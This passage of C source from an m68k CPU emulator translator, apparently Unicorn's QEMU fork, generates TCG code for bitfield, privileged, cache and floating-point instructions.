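    uint32_t ins = src & ~maski;                  /* low len bits of src */
    uint32_t rins  = roti ? (ins >> roti) | (ins << (32 - roti)) : ins;
    uint32_t rmask = roti ? (maski >> roti) | (maski << (32 - roti)) : maski;
    return (dst & rmask) | rins;
}
#endif

/* Check for suitability for deposit.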
*/ if (pos >= 0) { tcg_gen_deposit_i32(tcg_ctx, dst, dst, src, pos, len); } else { #ifdef _MSC_VER uint32_t maski = 0xfffffffeU << (len - 1); #else uint32_t maski = -2U << (len - 1); #endif uint32_t roti = (ofs + len) & 31; tcg_gen_andi_i32(tcg_ctx, tmp, src, ~maski); tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, roti); tcg_gen_andi_i32(tcg_ctx, dst, dst, ror32(maski, roti)); tcg_gen_or_i32(tcg_ctx, dst, dst, tmp); } } else { TCGv mask = tcg_temp_new(tcg_ctx); TCGv rot = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_subi_i32(tcg_ctx, rot, DREG(ext, 0), 1); tcg_gen_andi_i32(tcg_ctx, rot, rot, 31); tcg_gen_movi_i32(tcg_ctx, mask, -2); tcg_gen_shl_i32(tcg_ctx, mask, mask, rot); tcg_gen_mov_i32(tcg_ctx, rot, DREG(ext, 0)); tcg_gen_andc_i32(tcg_ctx, tmp, src, mask); } else { /* Immediate width (variable offset) */ #ifdef _MSC_VER uint32_t maski = 0xfffffffeU << (len - 1); #else uint32_t maski = -2U << (len - 1); #endif tcg_gen_andi_i32(tcg_ctx, tmp, src, ~maski); tcg_gen_movi_i32(tcg_ctx, mask, maski); tcg_gen_movi_i32(tcg_ctx, rot, len & 31); } if (ext & 0x800) { /* Variable offset */ tcg_gen_add_i32(tcg_ctx, rot, rot, DREG(ext, 6)); } else { /* Immediate offset (variable width) */ tcg_gen_addi_i32(tcg_ctx, rot, rot, ofs); } tcg_gen_andi_i32(tcg_ctx, rot, rot, 31); tcg_gen_rotr_i32(tcg_ctx, mask, mask, rot); tcg_gen_rotr_i32(tcg_ctx, tmp, tmp, rot); tcg_gen_and_i32(tcg_ctx, dst, dst, mask); tcg_gen_or_i32(tcg_ctx, dst, dst, tmp); tcg_temp_free(tcg_ctx, rot); tcg_temp_free(tcg_ctx, mask); } tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(bfins_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv src = DREG(ext, 12); TCGv addr, len, ofs; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } gen_helper_bfins_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, src, ofs, len); set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(ff1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_logic_cc(s, reg, OS_LONG); gen_helper_ff1(tcg_ctx, reg, reg); } DISAS_INSN(chk) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, reg; int opsize; switch ((insn >> 7) & 3) { case 3: opsize = OS_WORD; break; case 2: if (m68k_feature(env, M68K_FEATURE_CHK2)) { opsize = OS_LONG; break; } /* fallthru */ default: gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } SRC_EA(env, src, opsize, 1, NULL); reg = gen_extend(s, DREG(insn, 9), opsize, 1); gen_flush_flags(s); gen_helper_chk(tcg_ctx, tcg_ctx->cpu_env, reg, src); } DISAS_INSN(chk2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv addr1, addr2, bound1, bound2, reg; int opsize; switch ((insn >> 9) & 3) { case 0: opsize = OS_BYTE; break; case 1: opsize = OS_WORD; break; case 2: opsize = OS_LONG; break; default: gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } ext = read_im16(env, s); if ((ext & 0x0800) == 0) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } addr1 = gen_lea(env, s, insn, OS_UNSIZED); addr2 = tcg_temp_new(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, addr2, addr1, opsize_bytes(opsize)); bound1 = gen_load(s, opsize, addr1, 1, IS_USER(s)); tcg_temp_free(tcg_ctx, addr1); bound2 = gen_load(s, opsize, addr2, 1, IS_USER(s)); tcg_temp_free(tcg_ctx, 
addr2); reg = tcg_temp_new(tcg_ctx); if (ext & 0x8000) { tcg_gen_mov_i32(tcg_ctx, reg, AREG(ext, 12)); } else { gen_ext(tcg_ctx, reg, DREG(ext, 12), opsize, 1); } gen_flush_flags(s); gen_helper_chk2(tcg_ctx, tcg_ctx->cpu_env, reg, bound1, bound2); tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, bound1); tcg_temp_free(tcg_ctx, bound2); } static void m68k_copy_line(TCGContext *tcg_ctx, TCGv dst, TCGv src, int index) { TCGv addr; TCGv_i64 t0, t1; addr = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, addr, src, ~15); tcg_gen_qemu_ld64(tcg_ctx, t0, addr, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld64(tcg_ctx, t1, addr, index); tcg_gen_andi_i32(tcg_ctx, addr, dst, ~15); tcg_gen_qemu_st64(tcg_ctx, t0, addr, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st64(tcg_ctx, t1, addr, index); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, addr); } DISAS_INSN(move16_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; uint16_t ext; ext = read_im16(env, s); if ((ext & (1 << 15)) == 0) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } m68k_copy_line(tcg_ctx, AREG(ext, 12), AREG(insn, 0), index); /* Ax can be Ay, so save Ay before incrementing Ax */ tmp = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp, AREG(ext, 12)); tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), AREG(insn, 0), 16); tcg_gen_addi_i32(tcg_ctx, AREG(ext, 12), tmp, 16); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(move16_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv reg, addr; reg = AREG(insn, 0); addr = tcg_const_i32(tcg_ctx, read_im32(env, s)); if ((insn >> 3) & 1) { /* MOVE16 (xxx).L, (Ay) */ m68k_copy_line(tcg_ctx, reg, addr, index); } else { /* MOVE16 (Ay), (xxx).L */ m68k_copy_line(tcg_ctx, addr, reg, index); } tcg_temp_free(tcg_ctx, addr); if (((insn >> 3) & 2) == 0) { /* (Ay)+ */ tcg_gen_addi_i32(tcg_ctx, reg, reg, 16); } } DISAS_INSN(strldsr) { uint16_t ext; uint32_t addr; addr = s->pc - 2; ext = read_im16(env, s); if (ext != 0x46FC) { gen_exception(s, addr, EXCP_ILLEGAL); return; } ext = read_im16(env, s); if (IS_USER(s) || (ext & SR_S) == 0) { gen_exception(s, addr, EXCP_PRIVILEGE); return; } gen_push(s, gen_get_sr(s)); gen_set_sr_im(s, ext, 0); } DISAS_INSN(move_from_sr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv sr; if (IS_USER(s) && !m68k_feature(env, M68K_FEATURE_M68000)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } sr = gen_get_sr(s); DEST_EA(env, insn, OS_WORD, sr, NULL); } DISAS_INSN(moves) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; uint16_t ext; TCGv reg; TCGv addr; int extend; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); opsize = insn_opsize(insn); if (ext & 0x8000) { /* address register */ reg = AREG(ext, 12); extend = 1; } else { /* data register */ reg = DREG(ext, 12); extend = 0; } addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x0800) { /* from reg to ea */ gen_store(s, opsize, addr, reg, DFC_INDEX(s)); } else { /* from ea to reg */ TCGv tmp = gen_load(s, opsize, addr, 0, SFC_INDEX(s)); if (extend) { gen_ext(tcg_ctx, reg, tmp, opsize, 1); } else { gen_partset_reg(tcg_ctx, opsize, reg, tmp); } tcg_temp_free(tcg_ctx, tmp); } switch (extract32(insn, 3, 3)) { case 3: /* Indirect postincrement. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, REG(insn, 0) == 7 && opsize == OS_BYTE ? 
2 : opsize_bytes(opsize)); break; case 4: /* Indirect predecrement. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); break; } } DISAS_INSN(move_to_sr) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_move_to_sr(env, s, insn, false); gen_exit_tb(s); } DISAS_INSN(move_from_usp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } tcg_gen_ld_i32(tcg_ctx, AREG(insn, 0), tcg_ctx->cpu_env, offsetof(CPUM68KState, sp[M68K_USP])); } DISAS_INSN(move_to_usp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } tcg_gen_st_i32(tcg_ctx, AREG(insn, 0), tcg_ctx->cpu_env, offsetof(CPUM68KState, sp[M68K_USP])); } DISAS_INSN(halt) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_exception(s, s->pc, EXCP_HALT_INSN); } DISAS_INSN(stop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); gen_set_sr_im(s, ext, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_halted, 1); gen_exception(s, s->pc, EXCP_HLT); } DISAS_INSN(rte) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_exception(s, s->base.pc_next, EXCP_RTE); } DISAS_INSN(cf_movec) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv reg; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); if (ext & 0x8000) { reg = AREG(ext, 12); } else { reg = DREG(ext, 12); } gen_helper_cf_movec_to(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); gen_exit_tb(s); } DISAS_INSN(m68k_movec) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv reg; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } ext = read_im16(env, s); if (ext & 0x8000) { reg = AREG(ext, 12); } else { reg = DREG(ext, 12); } if (insn & 1) { gen_helper_m68k_movec_to(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); } else { gen_helper_m68k_movec_from(tcg_ctx, reg, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff)); } gen_exit_tb(s); } DISAS_INSN(intouch) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* ICache fetch. Implement as no-op. */ } DISAS_INSN(cpushl) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Cache push/invalidate. Implement as no-op. */ } DISAS_INSN(cpush) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Cache push/invalidate. Implement as no-op. */ } DISAS_INSN(cinv) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* Invalidate cache line. Implement as no-op. 
*/ } DISAS_INSN(pflush) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv opmode; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } opmode = tcg_const_i32(tcg_ctx, (insn >> 3) & 3); gen_helper_pflush(tcg_ctx, tcg_ctx->cpu_env, AREG(insn, 0), opmode); tcg_temp_free(tcg_ctx, opmode); } DISAS_INSN(ptest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv is_read; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } is_read = tcg_const_i32(tcg_ctx, (insn >> 5) & 1); gen_helper_ptest(tcg_ctx, tcg_ctx->cpu_env, AREG(insn, 0), is_read); tcg_temp_free(tcg_ctx, is_read); } DISAS_INSN(wddata) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); } DISAS_INSN(wdebug) { if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } /* TODO: Implement wdebug. */ cpu_abort(env_cpu(env), "WDEBUG not implemented"); } DISAS_INSN(trap) { gen_exception(s, s->base.pc_next, EXCP_TRAP0 + (insn & 0xf)); } static void gen_load_fcr(DisasContext *s, TCGv res, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (reg) { case M68K_FPIAR: tcg_gen_movi_i32(tcg_ctx, res, 0); break; case M68K_FPSR: tcg_gen_ld_i32(tcg_ctx, res, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpsr)); break; case M68K_FPCR: tcg_gen_ld_i32(tcg_ctx, res, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpcr)); break; } } static void gen_store_fcr(DisasContext *s, TCGv val, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (reg) { case M68K_FPIAR: break; case M68K_FPSR: tcg_gen_st_i32(tcg_ctx, val, tcg_ctx->cpu_env, offsetof(CPUM68KState, fpsr)); break; case M68K_FPCR: gen_helper_set_fpcr(tcg_ctx, tcg_ctx->cpu_env, val); break; } } static void gen_qemu_store_fcr(DisasContext *s, TCGv addr, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; tmp = tcg_temp_new(tcg_ctx); gen_load_fcr(s, tmp, reg); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); tcg_temp_free(tcg_ctx, tmp); } static void gen_qemu_load_fcr(DisasContext *s, TCGv addr, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int index = IS_USER(s); TCGv tmp; tmp = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_store_fcr(s, tmp, reg); tcg_temp_free(tcg_ctx, tmp); } static void gen_op_fmove_fcr(CPUM68KState *env, DisasContext *s, uint32_t insn, uint32_t ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ext >> 10) & 7; int is_write = (ext >> 13) & 1; int mode = extract32(insn, 3, 3); int i; TCGv addr, tmp; switch (mode) { case 0: /* Dn */ if (mask != M68K_FPIAR && mask != M68K_FPSR && mask != M68K_FPCR) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } if (is_write) { gen_load_fcr(s, DREG(insn, 0), mask); } else { gen_store_fcr(s, DREG(insn, 0), mask); } return; case 1: /* An, only with FPIAR */ if (mask != M68K_FPIAR) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } if (is_write) { gen_load_fcr(s, AREG(insn, 0), mask); } else { gen_store_fcr(s, AREG(insn, 0), mask); } return; default: break; } tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } addr = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, addr, tmp); /* * mask: * * 0b100 Floating-Point Control Register * 0b010 Floating-Point Status Register * 0b001 Floating-Point Instruction Address Register * */ if (is_write && mode == 4) { for (i = 2; i >= 0; i--, mask >>= 1) { if (mask & 1) { gen_qemu_store_fcr(s, addr, 1 << i); if (mask != 1) { tcg_gen_subi_i32(tcg_ctx, addr, addr, opsize_bytes(OS_LONG)); } } } tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } else { for 
(i = 0; i < 3; i++, mask >>= 1) { if (mask & 1) { if (is_write) { gen_qemu_store_fcr(s, addr, 1 << i); } else { gen_qemu_load_fcr(s, addr, 1 << i); } if (mask != 1 || mode == 3) { tcg_gen_addi_i32(tcg_ctx, addr, addr, opsize_bytes(OS_LONG)); } } } if (mode == 3) { tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); } } tcg_temp_free_i32(tcg_ctx, addr); } static void gen_op_fmovem(CPUM68KState *env, DisasContext *s, uint32_t insn, uint32_t ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv addr, tmp; int mode = (ext >> 11) & 0x3; int is_load = ((ext & 0x2000) == 0); if (m68k_feature(s->env, M68K_FEATURE_FPU)) { opsize = OS_EXTENDED; } else { opsize = OS_DOUBLE; /* FIXME */ } addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } tmp = tcg_temp_new(tcg_ctx); if (mode & 0x1) { /* Dynamic register list */ tcg_gen_ext8u_i32(tcg_ctx, tmp, DREG(ext, 4)); } else { /* Static register list */ tcg_gen_movi_i32(tcg_ctx, tmp, ext & 0xff); } if (!is_load && (mode & 2) == 0) { /* * predecrement addressing mode * only available to store register to memory */ if (opsize == OS_EXTENDED) { gen_helper_fmovemx_st_predec(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemd_st_predec(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } else { /* postincrement addressing mode */ if (opsize == OS_EXTENDED) { if (is_load) { gen_helper_fmovemx_ld_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemx_st_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } else { if (is_load) { gen_helper_fmovemd_ld_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } else { gen_helper_fmovemd_st_postinc(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, tmp); } } } if ((insn & 070) == 030 || (insn & 070) == 040) { tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp); } tcg_temp_free(tcg_ctx, tmp); } /* * ??? FP exceptions are not implemented. Most exceptions are deferred until * immediately before the next FP instruction is executed. */ DISAS_INSN(fpu) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; int opmode; int opsize; TCGv_ptr cpu_src, cpu_dest; ext = read_im16(env, s); opmode = ext & 0x7f; switch ((ext >> 13) & 7) { case 0: break; case 1: goto undef; case 2: if (insn == 0xf200 && (ext & 0xfc00) == 0x5c00) { /* fmovecr */ TCGv rom_offset = tcg_const_i32(tcg_ctx, opmode); cpu_dest = gen_fp_ptr(tcg_ctx, REG(ext, 7)); gen_helper_fconst(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, rom_offset); tcg_temp_free_ptr(tcg_ctx, cpu_dest); tcg_temp_free(tcg_ctx, rom_offset); return; } break; case 3: /* fmove out */ cpu_src = gen_fp_ptr(tcg_ctx, REG(ext, 7)); opsize = ext_opsize(ext, 10); if (gen_ea_fp(env, s, insn, opsize, cpu_src, EA_STORE, IS_USER(s)) == -1) { gen_addr_fault(s); } gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_src); tcg_temp_free_ptr(tcg_ctx, cpu_src); return; case 4: /* fmove to control register. */ case 5: /* fmove from control register. */ gen_op_fmove_fcr(env, s, insn, ext); return; case 6: /* fmovem */ case 7: if ((ext & 0x1000) == 0 && !m68k_feature(s->env, M68K_FEATURE_FPU)) { goto undef; } gen_op_fmovem(env, s, insn, ext); return; } if (ext & (1 << 14)) { /* Source effective address. */ opsize = ext_opsize(ext, 10); cpu_src = gen_fp_result_ptr(tcg_ctx); if (gen_ea_fp(env, s, insn, opsize, cpu_src, EA_LOADS, IS_USER(s)) == -1) { gen_addr_fault(s); return; } } else { /* Source register. 
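*/

/*
 * Illustrative sketch, not part of the build: the fields of the
 * general-operation FPU extension word as decoded above (MC68881
 * format).  Struct and function names are placeholders.
 */
#if 0
struct fpu_genop {
    int ea_source;        /* bit 14: 1 = source is <ea>, 0 = FP register */
    unsigned src;         /* bits 12..10: source FP reg, or <ea> format */
    unsigned dst;         /* bits  9..7: destination FP register */
    unsigned opmode;      /* bits  6..0: operation (fmove, fadd, ...) */
};
static struct fpu_genop fpu_decode_genop(uint16_t ext)
{
    struct fpu_genop d;
    d.ea_source = (ext >> 14) & 1;
    d.src = (ext >> 10) & 7;
    d.dst = (ext >> 7) & 7;
    d.opmode = ext & 0x7f;
    return d;
}
#endif

/* Source register.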
*/ opsize = OS_EXTENDED; cpu_src = gen_fp_ptr(tcg_ctx, REG(ext, 10)); } cpu_dest = gen_fp_ptr(tcg_ctx, REG(ext, 7)); switch (opmode) { case 0: /* fmove */ gen_fp_move(tcg_ctx, cpu_dest, cpu_src); break; case 0x40: /* fsmove */ gen_helper_fsround(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x44: /* fdmove */ gen_helper_fdround(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 1: /* fint */ gen_helper_firound(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 2: /* fsinh */ gen_helper_fsinh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 3: /* fintrz */ gen_helper_fitrunc(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 4: /* fsqrt */ gen_helper_fsqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x41: /* fssqrt */ gen_helper_fssqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x45: /* fdsqrt */ gen_helper_fdsqrt(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x06: /* flognp1 */ gen_helper_flognp1(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x09: /* ftanh */ gen_helper_ftanh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0a: /* fatan */ gen_helper_fatan(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0c: /* fasin */ gen_helper_fasin(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0d: /* fatanh */ gen_helper_fatanh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0e: /* fsin */ gen_helper_fsin(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x0f: /* ftan */ gen_helper_ftan(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x10: /* fetox */ gen_helper_fetox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x11: /* ftwotox */ gen_helper_ftwotox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x12: /* ftentox */ gen_helper_ftentox(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x14: /* flogn */ gen_helper_flogn(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x15: /* flog10 */ gen_helper_flog10(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x16: /* flog2 */ gen_helper_flog2(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x18: /* fabs */ gen_helper_fabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x58: /* fsabs */ gen_helper_fsabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5c: /* fdabs */ gen_helper_fdabs(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x19: /* fcosh */ gen_helper_fcosh(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1a: /* fneg */ gen_helper_fneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5a: /* fsneg */ gen_helper_fsneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x5e: /* fdneg */ gen_helper_fdneg(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1c: /* facos */ gen_helper_facos(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1d: /* fcos */ gen_helper_fcos(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1e: /* fgetexp */ gen_helper_fgetexp(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x1f: /* fgetman */ gen_helper_fgetman(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src); break; case 0x20: /* fdiv */ gen_helper_fdiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x60: /* fsdiv */ gen_helper_fsdiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x64: /* fddiv */ gen_helper_fddiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x21: /* 
fmod */ gen_helper_fmod(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x22: /* fadd */ gen_helper_fadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x62: /* fsadd */ gen_helper_fsadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x66: /* fdadd */ gen_helper_fdadd(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x23: /* fmul */ gen_helper_fmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x63: /* fsmul */ gen_helper_fsmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x67: /* fdmul */ gen_helper_fdmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x24: /* fsgldiv */ gen_helper_fsgldiv(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x25: /* frem */ gen_helper_frem(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x26: /* fscale */ gen_helper_fscale(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x27: /* fsglmul */ gen_helper_fsglmul(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x28: /* fsub */ gen_helper_fsub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x68: /* fssub */ gen_helper_fssub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x6c: /* fdsub */ gen_helper_fdsub(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_src, cpu_dest); break; case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: case 0x36: case 0x37: { TCGv_ptr cpu_dest2 = gen_fp_ptr(tcg_ctx, REG(ext, 0)); gen_helper_fsincos(tcg_ctx, tcg_ctx->cpu_env, cpu_dest, cpu_dest2, cpu_src); tcg_temp_free_ptr(tcg_ctx, cpu_dest2); } break; case 0x38: /* fcmp */ gen_helper_fcmp(tcg_ctx, tcg_ctx->cpu_env, cpu_src, cpu_dest); return; case 0x3a: /* ftst */ gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_src); return; default: goto undef; } tcg_temp_free_ptr(tcg_ctx, cpu_src); gen_helper_ftst(tcg_ctx, tcg_ctx->cpu_env, cpu_dest); tcg_temp_free_ptr(tcg_ctx, cpu_dest); return; undef: /* FIXME: Is this right for offset addressing modes? */ s->pc -= 2; disas_undef_fpu(env, s, insn); } static void gen_fcc_cond(DisasCompare *c, DisasContext *s, int cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv fpsr; c->g1 = 1; c->v2 = tcg_const_i32(tcg_ctx, 0); c->g2 = 0; /* TODO: Raise BSUN exception. 
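     * BSUN concerns the IEEE-nonaware predicates (the "Signaling"
     * conditions 16..31 handled below), which are expected to trap when
     * the NaN condition code is set; that behaviour is not modelled here.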
